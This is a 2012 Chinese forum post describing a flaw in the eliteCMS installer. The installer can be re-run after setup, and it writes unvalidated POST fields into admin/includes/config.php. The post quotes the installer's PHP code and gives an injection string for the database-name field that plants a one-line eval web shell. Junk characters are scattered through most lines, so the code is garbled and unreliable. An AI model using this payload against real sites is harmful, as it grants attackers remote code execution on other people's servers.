eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
, ]# O" F( C4 ^8 H3 u4 }' P6 {! E* d- ]; o
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php/ s7 H- _. F+ l0 l9 u( @) p
我们来看代码:. ]# [+ L1 O, P, W7 m' N8 ^) \* v
- O+ C0 _- x* T# \7 X6 s" u& {
...6 ?+ L) y1 q) ~; Q+ N) ?
elseif ($_GET['step'] == "4") {: g3 \5 w H. F# r8 p) X
$file = "../admin/includes/config.php";- K/ Z+ n5 }+ b
$write = "<?php\n";5 ~4 z l9 s% E8 a) O G
$write .= "/**\n";: V4 p3 `9 L- v" `5 t: U1 x2 F
$write .= "*\n";
) P% I* z$ U) T $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
6 ?3 R8 |2 U v3 ?6 [...略..., a" n% a _2 ~ n$ S
$write .= "*\n";# F1 O2 B) D' B, Y6 h# C
$write .= "*/\n";/ @9 b( I# S/ ^
$write .= "\n";
9 W! j" @3 ], v/ x $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
2 n$ e6 i4 R$ u& N; l; T $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";9 q4 W) R; n# q# s
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
0 A* r4 q J& a' g7 {, o. C $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";1 {0 ~: W, w- t% V5 J0 j8 W- q
$write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
9 N1 L& |# X- e $write .= "if (!\$connection) {\n";
0 E3 H! |+ \+ o( [ $write .= " die(\"Database connection failed\" .mysql_error());\n";" [. R+ R; `, p. j
$write .= " \n";
) e8 D! t& U( x7 Q' ]0 B) ` $write .= "} \n";
9 e4 n1 w( G$ A& `+ h2 _! V( X $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
. K- O5 v7 p1 C/ \: r5 c $write .= "if (!\$db_select) {\n";+ u7 x8 q7 ]; ~/ v
$write .= " die(\"Database select failed\" .mysql_error());\n";" _# q2 C# {9 R$ I) W0 A' G
$write .= " \n";2 V: X1 e( F9 T& ?8 O: s
$write .= "} \n";) C- H9 U! c9 A7 y
$write .= "?>\n";
+ [& A5 @. Z0 x: y
& s( b5 \) J* f8 w( V# h* x $writer = fopen($file, 'w');
- ^/ Z+ V; ]9 c! K6 e4 b1 y7 k: |.... t8 ^* p6 n- Z# E! l" k* @3 P+ E9 ~! a! E
8 V* f6 d) I; W6 n P在看代码:4 ~7 P9 m2 h2 E
7 S9 ~: [4 h8 I4 ^- W
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$ o0 [6 n7 Y. n6 l% x# S( g; v9 Q1 z$_SESSION['DB_NAME'] = $_POST['DB_NAME'];- _- o8 c1 g8 |( Q" w& p/ t1 j, f
$_SESSION['DB_USER'] = $_POST['DB_USER'];
3 S! Q# l; M4 a) M! j/ a3 X$_SESSION['DB_PASS'] = $_POST['DB_PASS'];2 ?* k9 @; n2 }7 l1 Z% U# r2 @
4 j1 C+ {6 W: \- b: \" _+ _
取值未作任何验证
4 E& p+ @. j. G# m$ S! h9 G1 q如果将数据库名POST数据:5 m3 |. E9 z' \9 \2 j3 K
4 E4 C2 y2 w& J& \
"?><?php eval($_POST[c]);?><?php
' t" s) g$ \+ o+ I
4 ?6 d9 d, l/ Q) v将导致一句话后门写入/admin/includes/config.php
) m6 P- a3 i- }& M( C6 N |
发表于 2012-11-18 13:59:27
收藏
支持
反对